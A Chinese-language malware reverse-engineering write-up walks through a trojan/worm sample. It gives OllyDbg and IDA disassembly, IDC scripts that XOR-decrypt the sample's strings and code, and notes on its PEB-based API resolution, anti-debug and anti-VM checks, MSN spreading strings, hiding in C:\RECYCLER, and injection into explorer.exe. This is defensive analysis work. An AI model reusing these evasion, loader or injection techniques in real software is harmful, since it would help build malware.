特别申明:附件里面的exe-1文件为木马,如想调试分析,请在虚拟环境中调试,切不可在本机执行。
特别申明:附件里面的exe-1文件为木马,如想调试分析,请在虚拟环境中调试,切不可在本机执行。
特别申明:附件里面的exe-1文件为木马,如想调试分析,请在虚拟环境中调试,切不可在本机执行。
首先定位到如下,是一段根据PEB定位kernel32.dll 的 ImageBase 的代码(很多地方用到类似的代码,甚至很多shellcode也是类似的代码)
00401055 |> B8 30000000 MOV EAX,30
0040105A |. 64:8B10 MOV EDX,DWORD PTR FS:[EAX]
0040105D |. 83C2 0C ADD EDX,0C
00401060 |. 8B0A MOV ECX,DWORD PTR DS:[EDX]
00401062 |. 83C1 1C ADD ECX,1C
00401065 |. 8B19 MOV EBX,DWORD PTR DS:[ECX]
00401067 |. 8B03 MOV EAX,DWORD PTR DS:[EBX]
00401069 |. 83C0 08 ADD EAX,8
0040106C |. 8B00 MOV EAX,DWORD PTR DS:[EAX]
0040106E |. 8945 C8 MOV DWORD PTR SS:[EBP-38],EAX
00401071 |. 8B4D C8 MOV ECX,DWORD PTR SS:[EBP-38]
00401074 |. 8B51 3C MOV EDX,DWORD PTR DS:[ECX+3C]
00401077 |. 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
0040107A |. 8D4C10 18 LEA ECX,DWORD PTR DS:[EAX+EDX+18]
0040107E |. 894D D4 MOV DWORD PTR SS:[EBP-2C],ECX
00401081 |. 8B55 D4 MOV EDX,DWORD PTR SS:[EBP-2C]
00401084 |. 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
00401087 |. 0342 60 ADD EAX,DWORD PTR DS:[EDX+60]
0040108A |. 8945 EC MOV DWORD PTR SS:[EBP-14],EAX ;eax=the address of Export VirtualAddress
0040108D |. C745 E8 B03C41>MOV DWORD PTR SS:[EBP-18],test.00413CB0
00401094 |. C745 F4 000000>MOV DWORD PTR SS:[EBP-C],0
第一次解密:进入一个双重循环,这是一段解密循环,解密比较简单:
0040109B |. EB 09 JMP SHORT test.004010A6
0040109D |> 8B4D F4 /MOV ECX,DWORD PTR SS:[EBP-C]
004010A0 |. 83C1 01 |ADD ECX,1
004010A3 |. 894D F4 |MOV DWORD PTR SS:[EBP-C],ECX
004010A6 |> 837D F4 0E CMP DWORD PTR SS:[EBP-C],0E
004010AA |. 73 39 |JNB SHORT test.004010E5
004010AC |. C745 D0 000000>|MOV DWORD PTR SS:[EBP-30],0
004010B3 |. EB 09 |JMP SHORT test.004010BE
004010B5 |> 8B55 D0 |/MOV EDX,DWORD PTR SS:[EBP-30]
004010B8 |. 83C2 01 ||ADD EDX,1
004010BB |. 8955 D0 ||MOV DWORD PTR SS:[EBP-30],EDX
004010BE |> 837D D0 04 | CMP DWORD PTR SS:[EBP-30],4
004010C2 |. 73 1F ||JNB SHORT test.004010E3
004010C4 |. 8B45 D0 ||MOV EAX,DWORD PTR SS:[EBP-30]
004010C7 |. 0FBE88 A03C410>||MOVSX ECX,BYTE PTR DS:[EAX+413CA0]
004010CE |. 8B55 E8 ||MOV EDX,DWORD PTR SS:[EBP-18] ; test.00413CB0
004010D1 |. 0355 F4 ||ADD EDX,DWORD PTR SS:[EBP-C]
004010D4 |. 0FBE02 ||MOVSX EAX,BYTE PTR DS:[EDX]
004010D7 |. 33C1 ||XOR EAX,ECX
004010D9 |. 8B4D E8 ||MOV ECX,DWORD PTR SS:[EBP-18]
004010DC |. 034D F4 ||ADD ECX,DWORD PTR SS:[EBP-C]
004010DF |. 8801 ||MOV BYTE PTR DS:[ECX],AL
004010E1 |.^EB D2 |\JMP SHORT test.004010B5
004010E3 |>^EB B8 \JMP SHORT test.0040109D
为此我写了一段简单的解密IDC:
auto start,addr_of_key,i,j;
start=0x413CB0;
addr_of_key=0x413CA0;
for(i=0;i<0xe;i++)
{
for(j=0;j<4;j++)
{
PatchByte(start,Byte(start)^Byte(addr_of_key));
addr_of_key++;
}
start++;
addr_of_key=0x413CA0;
}
解密后start=0x413CB0 里面的eh个字节 的内容变为:'VirtualProtect'(都在我会提供的idb文件里面了)
紧接着的这段是在kernel32.dll,中找到 VirtualProtect
004010EC |. EB 09 JMP SHORT test.004010F7
004010EE |> 8B55 F4 /MOV EDX,DWORD PTR SS:[EBP-C]
004010F1 |. 83C2 01 |ADD EDX,1
004010F4 |. 8955 F4 |MOV DWORD PTR SS:[EBP-C],EDX
004010F7 |> 8B45 EC MOV EAX,DWORD PTR SS:[EBP-14]
004010FA |. 8B4D F4 |MOV ECX,DWORD PTR SS:[EBP-C]
004010FD |. 3B48 18 |CMP ECX,DWORD PTR DS:[EAX+18]
00401100 |. 73 5D |JNB SHORT test.0040115F
00401102 |. 8B55 EC |MOV EDX,DWORD PTR SS:[EBP-14]
00401105 |. 8B45 C8 |MOV EAX,DWORD PTR SS:[EBP-38]
00401108 |. 0342 20 |ADD EAX,DWORD PTR DS:[EDX+20]
0040110B |. 8B4D F4 |MOV ECX,DWORD PTR SS:[EBP-C]
0040110E |. 8B1488 |MOV EDX,DWORD PTR DS:[EAX+ECX*4]
00401111 |. 0355 C8 |ADD EDX,DWORD PTR SS:[EBP-38]
00401114 |. 8955 F0 |MOV DWORD PTR SS:[EBP-10],EDX
00401117 |. 8B45 F0 |MOV EAX,DWORD PTR SS:[EBP-10]
0040111A |. 8945 D8 |MOV DWORD PTR SS:[EBP-28],EAX
0040111D |. 8B4D E8 |MOV ECX,DWORD PTR SS:[EBP-18]
00401120 |. 894D CC |MOV DWORD PTR SS:[EBP-34],ECX
00401123 |. C745 D0 000000>|MOV DWORD PTR SS:[EBP-30],0
0040112A |. EB 09 |JMP SHORT test.00401135
0040112C |> 8B55 D0 |/MOV EDX,DWORD PTR SS:[EBP-30]
0040112F |. 83C2 01 ||ADD EDX,1
00401132 |. 8955 D0 ||MOV DWORD PTR SS:[EBP-30],EDX
00401135 |> 837D D0 0E | CMP DWORD PTR SS:[EBP-30],0E ;VirtualProtect 正好e个字节,你是否还记得前面的循环
00401139 |. 73 1A ||JNB SHORT test.00401155
0040113B |. 8B45 D8 ||MOV EAX,DWORD PTR SS:[EBP-28]
0040113E |. 0345 D0 ||ADD EAX,DWORD PTR SS:[EBP-30]
00401141 |. 0FBE08 ||MOVSX ECX,BYTE PTR DS:[EAX]
00401144 |. 8B55 CC ||MOV EDX,DWORD PTR SS:[EBP-34]
00401147 |. 0355 D0 ||ADD EDX,DWORD PTR SS:[EBP-30]
0040114A |. 0FBE02 ||MOVSX EAX,BYTE PTR DS:[EDX]
0040114D |. 3BC8 ||CMP ECX,EAX
0040114F |. 74 02 ||JE SHORT test.00401153
00401151 |. EB 02 ||JMP SHORT test.00401155
00401153 |>^EB D7 |\JMP SHORT test.0040112C
00401155 |> 837D D0 0E |CMP DWORD PTR SS:[EBP-30],0E
00401159 |. 75 02 |JNZ SHORT test.0040115D
0040115B |. EB 02 |JMP SHORT test.0040115F
0040115D |>^EB 8F \JMP SHORT test.004010EE
0040115F |> 8B4D EC MOV ECX,DWORD PTR SS:[EBP-14]
00401162 |. 8B55 C8 MOV EDX,DWORD PTR SS:[EBP-38]
00401165 |. 0351 24 ADD EDX,DWORD PTR DS:[ECX+24]
00401168 |. 8B45 F4 MOV EAX,DWORD PTR SS:[EBP-C]
0040116B |. 0FB70C42 MOVZX ECX,WORD PTR DS:[EDX+EAX*2]
0040116F |. 894D FC MOV DWORD PTR SS:[EBP-4],ECX
00401172 |. 8B55 EC MOV EDX,DWORD PTR SS:[EBP-14]
00401175 |. 8B45 C8 MOV EAX,DWORD PTR SS:[EBP-38]
00401178 |. 0342 1C ADD EAX,DWORD PTR DS:[EDX+1C]
0040117B |. 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]
0040117E |. 8B1488 MOV EDX,DWORD PTR DS:[EAX+ECX*4]
00401181 |. 0355 C8 ADD EDX,DWORD PTR SS:[EBP-38]
00401184 |. 8955 F0 MOV DWORD PTR SS:[EBP-10],EDX
00401187 |. 8B45 F0 MOV EAX,DWORD PTR SS:[EBP-10] ; found kernel32.VirtualProtect
0040118A |. 8945 E4 MOV DWORD PTR SS:[EBP-1C],EAX
0040118D |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00401190 |. 51 PUSH ECX
00401191 |. 6A 40 PUSH 40
00401193 |. 68 00B00000 PUSH 0B000
00401198 |. 8B55 E0 MOV EDX,DWORD PTR SS:[EBP-20]
0040119B |. 83EA 13 SUB EDX,13
0040119E |. 52 PUSH EDX
0040119F |. FF55 E4 CALL DWORD PTR SS:[EBP-1C] ; kernel32.VirtualProtect
第二次解密
004011B4 |. EB 09 JMP SHORT test.004011BF
004011B6 |> 8B4D F4 /MOV ECX,DWORD PTR SS:[EBP-C]
004011B9 |. 83C1 01 |ADD ECX,1
004011BC |. 894D F4 |MOV DWORD PTR SS:[EBP-C],ECX
004011BF |> 817D F4 A88D00> CMP DWORD PTR SS:[EBP-C],8DA8
004011C6 |. 73 39 |JNB SHORT test.00401201
004011C8 |. C745 D0 000000>|MOV DWORD PTR SS:[EBP-30],0
004011CF |. EB 09 |JMP SHORT test.004011DA
004011D1 |> 8B55 D0 |/MOV EDX,DWORD PTR SS:[EBP-30]
004011D4 |. 83C2 01 ||ADD EDX,1
004011D7 |. 8955 D0 ||MOV DWORD PTR SS:[EBP-30],EDX
004011DA |> 837D D0 04 | CMP DWORD PTR SS:[EBP-30],4
004011DE |. 73 1F ||JNB SHORT test.004011FF
004011E0 |. 8B45 D0 ||MOV EAX,DWORD PTR SS:[EBP-30]
004011E3 |. 0FBE88 A03C410>||MOVSX ECX,BYTE PTR DS:[EAX+413CA0]
004011EA |. 8B55 E8 ||MOV EDX,DWORD PTR SS:[EBP-18]
004011ED |. 0355 F4 ||ADD EDX,DWORD PTR SS:[EBP-C]
004011F0 |. 0FBE02 ||MOVSX EAX,BYTE PTR DS:[EDX]
004011F3 |. 33C1 ||XOR EAX,ECX
004011F5 |. 8B4D E8 ||MOV ECX,DWORD PTR SS:[EBP-18]
004011F8 |. 034D F4 ||ADD ECX,DWORD PTR SS:[EBP-C]
004011FB |. 8801 ||MOV BYTE PTR DS:[ECX],AL
004011FD |.^EB D2 |\JMP SHORT test.004011D1
004011FF |>^EB B5 \JMP SHORT test.004011B6
与上面第一次循环完全一样,为此我简单的修改了上段IDC脚本:
auto start,addr_of_key,i,j;
start=0x401210;
addr_of_key=0x413CA0;
for(i=0;i<0x8DA8;i++)
{
for(j=0;j<4;j++)
{
PatchByte(start,Byte(start)^Byte(addr_of_key));
addr_of_key++;
}
start++;
addr_of_key=0x413CA0;
}
Shift+F2 输入上段解密脚本,然后查看0x401210 中的内容是否已经解密掉,以供我们接下来的"动静结合"分析
你也可以直接在OD 里面 F4 到 00401201,跳出循环,解密已经完成。
F7 进入 401FE0 (我下面直接给出了我在IDA中做了注解的静态代码,如果你跟着用IDC将IDA中的代码解密了的话,应该也能进入下面的代码)
.text:00401FE0 55 push ebp
.text:00401FE1 8B EC mov ebp, esp
.text:00401FE3 81 EC D4 02 00 00 sub esp, 2D4h
.text:00401FE9 68 B8 02 00 00 push 2B8h
.text:00401FEE 8D 85 30 FD FF FF lea eax, [ebp+var_2D0]
.text:00401FF4 50 push eax
.text:00401FF5 E8 A6 15 00 00 call Zero_Memory //此函数功能相当于将一段内存置为0
.text:00401FFA C7 85 B4 FE FF FF B0 3C+ mov [ebp+var_14C], offset aVirtualprotect ; the address of 3thd loop
.text:00402004 C7 85 B8 FE FF FF A0 3C+ mov [ebp+var_148], offset byte_413CA0 ; decrypt key in 3thd_loop
.text:0040200E C7 85 BC FE FF FF A8 3C+ mov [ebp+var_144], offset unk_413CA8
.text:00402018 C7 45 D0 7C 0A 00 00 mov [ebp+var_30], 0A7Ch ; Decrypted length
.text:0040201F E8 5C FF FF FF call Inside_3thd_decrypt
.text:00402024 8D 8D 30 FD FF FF lea ecx, [ebp+var_2D0]
.text:0040202A 51 push ecx
.text:0040202B E8 E0 F1 FF FF call FIX_IAT ; here obtain API's running address,really like fix IAT,so i use this name
.text:00402030 85 C0 test eax, eax
.text:00402032 75 07 jnz short loc_40203B
.text:00402034 33 C0 xor eax, eax
.text:00402036 E9 5B 01 00 00 jmp loc_402196
.text:0040203B ; ---------------------------------------------------------------------------
F7 进入 Inside_3thd_decrypt(OD中的地址是 401F80)很快你会看到如下代码片段:
下面是第三段解密循环,我也准备了下面的IDC脚本,幸好这个木马作者老是用了相同并简单解密算法(曾经痛苦的一次,我曾经为一个木马写了5段完全不一样的IDC解密脚本,暴
寒)
00401F8D |. EB 09 JMP SHORT test.00401F98
00401F8F |> 8B45 FC /MOV EAX,DWORD PTR SS:[EBP-4]
00401F92 |. 83C0 01 |ADD EAX,1
00401F95 |. 8945 FC |MOV DWORD PTR SS:[EBP-4],EAX
00401F98 |> 817D FC 7C0A00> CMP DWORD PTR SS:[EBP-4],0A7C
00401F9F |. 73 3B |JNB SHORT test.00401FDC
00401FA1 |. C745 F8 000000>|MOV DWORD PTR SS:[EBP-8],0
00401FA8 |. EB 09 |JMP SHORT test.00401FB3
00401FAA |> 8B4D F8 |/MOV ECX,DWORD PTR SS:[EBP-8]
00401FAD |. 83C1 01 ||ADD ECX,1
00401FB0 |. 894D F8 ||MOV DWORD PTR SS:[EBP-8],ECX
00401FB3 |> 837D F8 04 | CMP DWORD PTR SS:[EBP-8],4
00401FB7 |. 73 21 ||JNB SHORT test.00401FDA
00401FB9 |. 8B55 F8 ||MOV EDX,DWORD PTR SS:[EBP-8]
00401FBC |. 0FBE82 A03C410>||MOVSX EAX,BYTE PTR DS:[EDX+413CA0]
00401FC3 |. 8B4D FC ||MOV ECX,DWORD PTR SS:[EBP-4]
00401FC6 |. 0FBE91 B03C410>||MOVSX EDX,BYTE PTR DS:[ECX+413CB0]
00401FCD |. 33D0 ||XOR EDX,EAX
00401FCF |. 8B45 FC ||MOV EAX,DWORD PTR SS:[EBP-4]
00401FD2 |. 8890 B03C4100 ||MOV BYTE PTR DS:[EAX+413CB0],DL
00401FD8 |.^EB D0 |\JMP SHORT test.00401FAA
00401FDA |>^EB B3 \JMP SHORT test.00401F8F
IDC解密脚本:
auto start,addr_of_key,i,j;
start=0x413cb0;
addr_of_key=0x413CA0;
for(i=0;i<0xa7c;i++)
{
for(j=0;j<4;j++)
{
PatchByte(start,Byte(start)^Byte(addr_of_key));
addr_of_key++;
}
start++;
addr_of_key=0x413CA0;
}
在IDA 输入上述IDC 脚本,你立马应该可以看在IDA的地址413CB0 下看到如下内容:
.data:00413CB0 59 66 7D 7B 7A 6E 63 5F+aVirtualprotect db 'Yf}{znc_}`{jl{' ; DATA XREF: WinMain(x,x,x,x)+8Do
.data:00413CB0 7D 60 7B 6A 6C 7B ; Inside_3thd_decrypt+46r ...
.data:00413CBE 00 db 0
.data:00413CBF 52 65 67 4F 70 65 6E 4B+aRegopenkeya db 'RegOpenKeyA',0
.data:00413CCB 4D 65 73 73 61 67 65 42+aMessageboxa_0 db 'MessageBoxA',0
.data:00413CD7 52 65 67 69 73 74 65 72+aRegisterdevicenoti db 'RegisterDeviceNotificationA',0
.data:00413CF3 44 65 66 57 69 6E 64 6F+aDefwindowproca db 'DefWindowProcA',0
.data:00413D02 52 65 67 69 73 74 65 72+aRegisterclassexa db 'RegisterClassExA',0
.data:00413D13 43 72 65 61 74 65 57 69+aCreatewindowexa db 'CreateWindowExA',0
.data:00413D23 44 65 73 74 72 6F 79 57+aDestroywindow db 'DestroyWindow',0
.data:00413D31 55 6E 72 65 67 69 73 74+aUnregisterclassa db 'UnregisterClassA',0
.data:00413D42 55 6E 72 65 67 69 73 74+aUnregisterdeviceno db 'UnregisterDeviceNotification',0
.data:00413D5F 50 65 65 6B 4D 65 73 73+aPeekmessagea db 'PeekMessageA',0
.data:00413D6C 44 69 73 70 61 74 63 68+aDispatchmessagea db 'DispatchMessageA',0
.data:00413D7D 75 73 65 72 33 32 2E 64+aUser32_dll db 'user32.dll',0
解密出来的东西真多,我不一一列举:
在解密后的字符串列表中也很容易看到类似的内容:
.data:00414279 72 65 6D 6F 76 65 00 aRemove db 'remove',0
.data:00414280 64 6F 77 6E 00 aDown db 'down',0
.data:00414285 75 70 64 61 74 65 00 aUpdate db 'update',0
.data:0041428C 4D 6F 7A 69 6C 6C 61 00 aMozilla db 'Mozilla',0
.data:00414294 5C 5C 2E 5C 70 69 70 65+a_PipeZhtgvbkgl87 db '\\.\pipe\zhtGvbkgl87',0
.data:004142A9 4D 53 4E 20 6C 69 6E 6B+aMsnLinkSent db 'MSN link sent ',0
.data:004142B8 6D 73 6E 6D 73 67 72 2E+aMsnmsgr_exe db 'msnmsgr.exe',0
.data:004142C4 74 65 78 74 2F 70 6C 61+aTextPlain db 'text/plain',0
.data:004142CF 4D 53 4E 20 73 70 72 65+aMsnSpreadStartedLi db 'MSN spread started, link: ',0
.data:004142EA 4D 53 4E 20 73 70 72 65+aMsnSpreaderRunning db 'MSN spreader running',0
.data:004142FF 44 6F 6E 65 21 20 00 aDone db 'Done! ',0
.data:00414306 46 61 69 6C 65 64 21 00 aFailed db 'Failed!',0
Backdoor(后门),或者Worm(蠕虫)!你问我是怎么知道,我只能说是经验,malware分析太需要经验了,你如果也想获得类似的经验,跟着我的思路走就可以了,:)。
回到 之前 F7 进入 FIX_IAT (OD 中是 401210),我这里直接给出了我在IDA给出了注释的代码,你可以在我提供的IDB文件里面找到如下清单:在FIX_IAT中用到
Get_kernelMemoryAddress,这个函数用PEB获得kernel32.dll ImageBase,然后大量使用Get_ApI_address,通过上述解密的API的字符串来通过导出表获得函数的真实地址。
.text:00401210 FIX_IAT proc near ; CODE XREF: sub_401FE0+4Bp
.text:00401210
.text:00401210 arg_0 = dword ptr 8
.text:00401210
.text:00401210 55 push ebp
.text:00401211 8B EC mov ebp, esp
.text:00401213 E8 78 26 00 00 call Get_kernelMemoryAddress
.text:00401218 8B 4D 08 mov ecx, [ebp+arg_0]
.text:0040121B 89 01 mov [ecx], eax
.text:0040121D 8B 55 08 mov edx, [ebp+arg_0]
.text:00401220 8B 82 84 01 00 00 mov eax, [edx+184h]
.text:00401226 05 EB 00 00 00 add eax, 0EBh
.text:0040122B 50 push eax
.text:0040122C 8B 4D 08 mov ecx, [ebp+arg_0]
.text:0040122F 8B 11 mov edx, [ecx]
.text:00401231 52 push edx
.text:00401232 E8 79 26 00 00 call Get_ApI_address
.text:00401237 8B 4D 08 mov ecx, [ebp+arg_0]
.text:0040123A 89 41 44 mov [ecx+44h], eax
.text:0040123D 8B 55 08 mov edx, [ebp+arg_0]
.text:00401240 8B 82 84 01 00 00 mov eax, [edx+184h]
.text:00401246 05 D8 00 00 00 add eax, 0D8h
.text:0040124B 50 push eax
.text:0040124C 8B 4D 08 mov ecx, [ebp+arg_0]
FIX_IAT是一个大函数,hehe,其中我标识的一个函数Anti_debugs (4022B0),其中用了很多anti,(antidebug and antivmware),虽然已经很古老,但是再复习下不是一件坏
事情,我都给出了相应的注释,你应该能一看就明白了:
.text:00401397 E8 14 0F 00 00 call Anti_debugs ; debug and vmware check
.text:0040139C 85 C0 test eax, eax
.text:0040139E 75 07 jnz short loc_4013A7
.text:004013A0 33 C0 xor eax, eax
.text:004013A2 E9 5C 0B 00 00 jmp loc_401F03
.text:004013A7 ; ---------------------------------------------------------------------------
直接在OD里面F4到 40139c,开始爆破,修改EAX=1,以使得所以anti失效果,看样子木马作者不知道,很多人都是从爆破开始入手逆向的呀,OD继续往下走,对照我给你的idb文
件,下面是很长的一段 Get_ApI_address 调用,以获取更多的api函数。
往下拉动IDA,修复的api 真多,直到00401A25
.text:00401A25 FF D2 call edx ; LoadLibrary load user32.dll 获取从user32.dll 中导出的api
直接返回到 402030 吧,F4 到402030 这时你看下堆栈,是否已经出现了很多api 的地址了,修复了很多啊。OD 往下走:
0040203B |> FF95 A0FDFFFF CALL DWORD PTR SS:[EBP-260] ;GetTickCount
00402041 |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX
00402044 |. 8D55 EC LEA EDX,DWORD PTR SS:[EBP-14]
00402047 |. 52 PUSH EDX
00402048 |. FF95 A8FDFFFF CALL DWORD PTR SS:[EBP-258] ;GetLocaltime
0040204E |. 0FB745 FA MOVZX EAX,WORD PTR SS:[EBP-6]
00402052 |. 0FB74D F8 MOVZX ECX,WORD PTR SS:[EBP-8]
00402056 |. 0FAFC1 IMUL EAX,ECX
00402059 |. 0FB755 F6 MOVZX EDX,WORD PTR SS:[EBP-A]
0040205D |. 0FAFC2 IMUL EAX,EDX
00402060 |. 0345 E0 ADD EAX,DWORD PTR SS:[EBP-20]
00402063 |. 8945 E0 MOV DWORD PTR SS:[EBP-20],EAX
00402066 |. 68 03010000 PUSH 103
0040206B |. 8D85 C0FEFFFF LEA EAX,DWORD PTR SS:[EBP-140]
00402071 |. 50 PUSH EAX
00402072 |. 6A 00 PUSH 0
00402074 |. FF95 78FDFFFF CALL DWORD PTR SS:[EBP-288] ; kernel32.GetModuleFileNameA
继续走
00402091 |> 8B45 FC /MOV EAX,DWORD PTR SS:[EBP-4]
00402094 |. 0FBE08 |MOVSX ECX,BYTE PTR DS:[EAX]
00402097 |. 83F9 5C |CMP ECX,5C //寻找 ‘5c’“/” 得到文件名
0040209A |. 74 0B |JE SHORT test.004020A7
0040209C |. 8B55 FC |MOV EDX,DWORD PTR SS:[EBP-4]
0040209F |. 83EA 01 |SUB EDX,1
004020A2 |. 8955 FC |MOV DWORD PTR SS:[EBP-4],EDX
004020A5 |.^EB EA \JMP SHORT test.00402091
004020A7 |> 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4]
004020AA |. 83C0 01 ADD EAX,1
004020AD |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
004020B0 |. 8B8D B4FEFFFF MOV ECX,DWORD PTR SS:[EBP-14C]
004020B6 |. 81C1 4A090000 ADD ECX,94A
004020BC |. 51 PUSH ECX ;launch.exe
004020BD |. 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
004020C0 |. 52 PUSH EDX
004020C1 |. FF95 D0FDFFFF CALL DWORD PTR SS:[EBP-230] ; kernel32.lstrcmpiA
继续
00402104 |. 6A 00 PUSH 0
00402106 |. FF95 0CFEFFFF CALL DWORD PTR SS:[EBP-1F4] :GetModuleHandle
0040210C |. 8945 D4 MOV DWORD PTR SS:[EBP-2C],EAX
0040210F |. 8B4D D4 MOV ECX,DWORD PTR SS:[EBP-2C]
00402112 |. 8B51 3C MOV EDX,DWORD PTR DS:[ECX+3C] :PE
00402115 |. 8B45 D4 MOV EAX,DWORD PTR SS:[EBP-2C]
00402118 |. 8D8C02 F800000>LEA ECX,DWORD PTR DS:[EDX+EAX+F8] :SectionTalbe
0040211F |. 894D FC MOV DWORD PTR SS:[EBP-4],ECX
00402122 |> 8B95 B4FEFFFF /MOV EDX,DWORD PTR SS:[EBP-14C]
00402128 |. 81C2 6F0A0000 |ADD EDX,0A6F
0040212E |. 52 |PUSH EDX ; /Arg2 = 0041471F ASCII ".text"
0040212F |. 8B45 FC |MOV EAX,DWORD PTR SS:[EBP-4] ; |
00402132 |. 50 |PUSH EAX ; |Arg1
00402133 |. E8 F8140000 |CALL test.00403630 ; \test.00403630 这处是第一节节名字是否为.text 第二节是否为.data
00402138 |. 85C0 |TEST EAX,EAX ;可能是为了防止其他人修改或者加壳吧,因为本身样本是有自己的加密方法的,虽然很弱,:)
0040213A |. 74 0B |JE SHORT test.00402147
0040213C |. 8B4D FC |MOV ECX,DWORD PTR SS:[EBP-4]
0040213F |. 83C1 28 |ADD ECX,28
00402142 |. 894D FC |MOV DWORD PTR SS:[EBP-4],ECX
00402145 |.^EB DB \JMP SHORT test.00402122
00402147 |> 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
继续往下 遇到 402CB0 F7 跟进
00402CB0 /$ 55 PUSH EBP
00402CB1 |. 8BEC MOV EBP,ESP
00402CB3 |. 81EC E0050000 SUB ESP,5E0
00402CB9 |. C785 28FAFFFF >MOV DWORD PTR SS:[EBP-5D8],0
00402CC3 |. C785 2CFAFFFF >MOV DWORD PTR SS:[EBP-5D4],0
00402CCD |> 83BD 28FAFFFF >/CMP DWORD PTR SS:[EBP-5D8],0
00402CD4 |. 75 3B |JNZ SHORT test.00402D11
00402CD6 |. 68 F4010000 |PUSH 1F4
00402CDB |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8]
00402CDE |. 8B88 B8000000 |MOV ECX,DWORD PTR DS:[EAX+B8]
00402CE4 |. FFD1 |CALL ECX ; kernel32.Sleep
00402CE6 |. 8D95 2CFAFFFF |LEA EDX,DWORD PTR SS:[EBP-5D4]
00402CEC |. 52 |PUSH EDX ; /Arg3
00402CED |. 8B45 08 |MOV EAX,DWORD PTR SS:[EBP+8] ; |
00402CF0 |. 8B88 84010000 |MOV ECX,DWORD PTR DS:[EAX+184] ; |
00402CF6 |. 81C1 7C050000 |ADD ECX,57C ; |
00402CFC |. 51 |PUSH ECX ; |Arg2 explorer.exe (inject?)
00402CFD |. 8B55 08 |MOV EDX,DWORD PTR SS:[EBP+8] ; |
00402D00 |. 83C2 1C |ADD EDX,1C ; |
00402D03 |. 52 |PUSH EDX ; |Arg1
00402D04 |. E8 470D0000 |CALL test.00403A50 ; \test.00403A50 F7 进入 实际就是想枚举进程以得到explorer.exe
00402D09 |. 8985 28FAFFFF |MOV DWORD PTR SS:[EBP-5D8],EAX
00402D0F |.^EB BC \JMP SHORT test.00402CCD
00402D11 |> 68 B4050000 PUSH 5B4 ; /Arg2 = 000005B4
00402D16 |. 8D85 38FAFFFF LEA EAX,DWORD PTR SS:[EBP-5C8] ; |
00402D1C |. 50 PUSH EAX ; |Arg1
00402D1D |. E8 7E080000 CALL test.004035A0 ; \test.004035A0
00402D22 |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
00402D25 |. 81C1 90010000 ADD ECX,190
00402D2B |. 51 PUSH ECX
00402D2C |. 8B55 08 MOV EDX,DWORD PTR SS:[EBP+8]
00402D2F |. 8B82 94000000 MOV EAX,DWORD PTR DS:[EDX+94]
00402D35 |. FFD0 CALL EAX ; kernel32.lstrlenA
F8 一直往下
00402D5A |> 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00402D5D |. 8B88 84010000 MOV ECX,DWORD PTR DS:[EAX+184]
00402D63 |. 81C1 9B050000 ADD ECX,59B
00402D69 |. 51 PUSH ECX
00402D6A |. 8B55 FC MOV EDX,DWORD PTR SS:[EBP-4]
00402D6D |. 52 PUSH EDX
00402D6E |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00402D71 |. 8B88 A0000000 MOV ECX,DWORD PTR DS:[EAX+A0]
00402D77 |. FFD1 CALL ECX ; kernel32.lstrcmpiA "\winlogon.exe"
.....................
00402D8D |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00402D90 |. 8B88 CC000000 MOV ECX,DWORD PTR DS:[EAX+CC]
00402D96 |. FFD1 CALL ECX ; kernel32.GetSystemDirectoryA
..........................
00402DE8 |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
00402DEB |. 8B91 BC000000 MOV EDX,DWORD PTR DS:[ECX+BC] ;c:\RECYCLER
00402DF1 |. FFD2 CALL EDX ; kernel32.CreateDirectoryA
00402DF3 |. 6A 07 PUSH 7
00402DF5 |. 8D85 B8FDFFFF LEA EAX,DWORD PTR SS:[EBP-248]
00402DFB |. 50 PUSH EAX
00402DFC |. 8B4D 08 MOV ECX,DWORD PTR SS:[EBP+8]
00402DFF |. 8B91 C4000000 MOV EDX,DWORD PTR DS:[ECX+C4]
00402E05 |. FFD2 CALL EDX ; kernel32.SetFileAttributesA
.......
00402EA0 |> 8B4D FC MOV ECX,DWORD PTR SS:[EBP-4]
00402EA3 |. C601 00 MOV BYTE PTR DS:[ECX],0
00402EA6 |. 6A 00 PUSH 0
00402EA8 |. 8D95 B8FDFFFF LEA EDX,DWORD PTR SS:[EBP-248]
00402EAE |. 52 PUSH EDX
00402EAF |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00402EB2 |. 8B88 BC000000 MOV ECX,DWORD PTR DS:[EAX+BC] ;"C:\RECYCLER\S-1-5-21-2070133153-9860220472-701320982-5341"
00402EB8 |. FFD1 CALL ECX ; kernel32.CreateDirectoryA
..........
00402F0E |. 6A 00 PUSH 0
00402F10 |. 6A 06 PUSH 6
00402F12 |. 6A 02 PUSH 2
00402F14 |. 6A 00 PUSH 0
00402F16 |. 6A 00 PUSH 0
00402F18 |. 68 00000040 PUSH 40000000
00402F1D |. 8D95 BCFEFFFF LEA EDX,DWORD PTR SS:[EBP-144]
00402F23 |. 52 PUSH EDX
00402F24 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
00402F27 |. 8B48 50 MOV ECX,DWORD PTR DS:[EAX+50] ;C:\RECYCLER\S-1-5-21-2070133153-9860220472-701320982-5341\Desktop.ini
00402F2A |. FFD1 CALL ECX ; kernel32.CreateFileA
写入内容为:ASCII "[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}" 最近看到几个木马用这种方式来隐藏自身
一直往下跟直到 4039F0 F7 进入,我在idb里面给出了函数名,这个也是一个写代码道explorer ,这个木马还是用了写进程这种老而精典的方法做inject
跟到这里才发现这段注入的代码跟我上个木马分析十分类似,难道作者是同一个人?所以接下来很大一部分是往explorer里面写代码。
所以一直F8 往下走
0040350D |. 51 PUSH ECX
0040350E |. 6A 00 PUSH 0
00403510 |. 8B95 24FAFFFF MOV EDX,DWORD PTR SS:[EBP-5DC]
00403516 |. 52 PUSH EDX
00403517 |. 8B85 20FAFFFF MOV EAX,DWORD PTR SS:[EBP-5E0]
0040351D |. 50 PUSH EAX
